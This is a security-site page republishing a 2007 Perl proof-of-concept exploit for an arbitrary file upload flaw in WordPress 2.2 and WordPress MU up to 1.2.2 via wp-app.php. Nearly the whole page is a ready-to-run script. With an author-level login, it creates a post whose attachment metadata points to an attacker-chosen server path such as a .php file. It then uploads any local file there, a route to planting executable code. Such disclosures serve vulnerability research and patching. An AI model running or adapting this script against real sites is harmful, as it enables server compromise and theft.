首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit
来源:http://www.buayacorp.com/ 作者:Alexander 发布时间:2007-06-27  
#! /usr/bin/env perl

# Wordpress 2.2 and Wordpress MU <= 1.2.2 Arbitrary File Upload PoC
#
# Credits : Alexander Concha <alex at buayacorp dot com>
# Website : http://www.buayacorp.com/
# Advisory: http://www.buayacorp.com/files/wordpress/wordpress-advisory.html

use Digest::MD5 qw(md5_hex);
use LWP::UserAgent;

my $ua = new LWP::UserAgent;
my $blog        = $ARGV[0];
my $user        = $ARGV[1];
my $pass        = $ARGV[2];
my $remote_file = $ARGV[3];
my $local_file  = $ARGV[4];
my $post_id     = $ARGV[5];

if (@ARGV < 4) {
       print "\nUsage:\n";
       print " wp-file-upload.pl <host> <username> <password> <remote_filename> [local_file] [post_id]\n\n";
       print " <host>        - full path to WordPress. http://victim.com/wordpress/\n";
       print " <username>    - valid username with any of these roles: author, editor, administrator\n";
       print " <password>    - valid password for the user\n";
       print " <remote_file> - full path to the remote file. /home/vulnerable.com/wordpress/wp-content/uploads/foo.php\n";
       print " [local_file]  - file to upload\n";
       print " [post_id]     - every time this script is executed creates a new post, specify a post_ID if you already run it\n\n";
       exit();
}
$ua->requests_redirectable([]);
$blog =~ s/\/*$/\//;

$url = 'wp-app.php';
if ( 200 != $ua->head($url . '?action=/service')->code ) {
       $url = 'app.php';
       die "\nIt seems that this WP installation is not vulnerable: app.php and wp-app.php were not found.\n"
               unless 200 == $ua->head($url . '?action=/service')->code;
}

$auth_cookie = get_auth_cookie();

sub LWP::UserAgent::simple_request {
       my($self, $request, $arg, $size) = @_;
       $request->header('Cookie' => $auth_cookie);
       $request->content_type('image/gif') if $request->method eq "PUT";
       $request->uri($blog . $request->uri);

       $self->_request_sanity_check($request);
       my $new_request = $self->prepare_request($request);
       $response = $self->send_request($new_request, $arg, $size);

       print $request->method . " " . $request->uri . " " . $response->code . "\n";

       return $response;
}

sub get_contents {
       $file = shift;
       if ( -e $file ) {
               open FILE, $file or die("Invalid local file");
               $file = join('', <FILE>);
               close FILE;
       } else {
               $file = <<PHP;
<?php echo "Hello World!"; ?>
PHP
       }
       return $file;
}
sub get_auth_cookie {
       $response = $ua->head('wp-login.php?logout');
       if ( $response->headers->header('Set-Cookie') =~ m/wordpress(user|pass)(.*?)=/ ) {
                       return "wordpressuser$2=$user;wordpresspass$2=".md5_hex(md5_hex($pass));
       }
       return '';
}
if (0 == $post_id) {
       $response = $ua->get('wp-admin/post-new.php');
       die ("\nInvalid credentials or blog url.\n\n" . $response->as_string) unless 200 == $response->code;

       if ( $response->content =~ m/name=._wpnonce. value=.([a-z\d]{10})./ ) {
               $response = $ua->post('wp-admin/post.php', [
                       '_wpnonce' => $1,
                       'action' => 'post',
                       'post_ID' => $post_id,
                       'post_type' => 'post',
                       'post_title' => 'foo',
                       'metakeyselect' => '#NONE#',
                       'metakeyinput' => '_wp_attached_file',
                       'metavalue' => $remote_file
                       ], 'Cookie' => $auth_cookie);

               # Checks for post-new.php?posted=post_ID
               if ( $response->headers->header('Location') =~ m/posted=(\d+)/ ) {
                       $post_id = $1;
               }
       }
}
die "\nCould not get a valid post_id value.\n" unless 0 != $post_id;

$request = HTTP::Request->new(PUT => $url . '?action=/attachment/file/'.$post_id);
$request->content(get_contents($local_file));
$response = $ua->request($request);

if ( 200 == $response->code ) {
       print "\nIt seems that the file has been posted successfully... :P\n";
       print "Use the following value to update the remote file: post_id '$post_id'\n";
} else {
       print "\nError: there is no attachment metadata for post_id=$post_id\n\n" . $response->as_string() . "\n";
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·NCTAudioStudio2 ActiveX DLL 2.
·RealNetworks RealPlayer/HelixP
·Tiny Download&&ExecShellCode
·Sony Network Camera SNC-P5 v1.
·DreamLog 0.5 (upload.php) Arbi
·AMX Corp. VNC ActiveX Control
·NCTAudioEditor2 ActiveX DLL (N
·AXIS Camera Control (AxisCamCo
·Simple Invoices 2007 05 25 (in
·MyCMS <= 0.9.8 Remote Command
·Pluxml 0.3.1 Remote Code Execu
·MyCMS <= 0.9.8 Remote Command
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved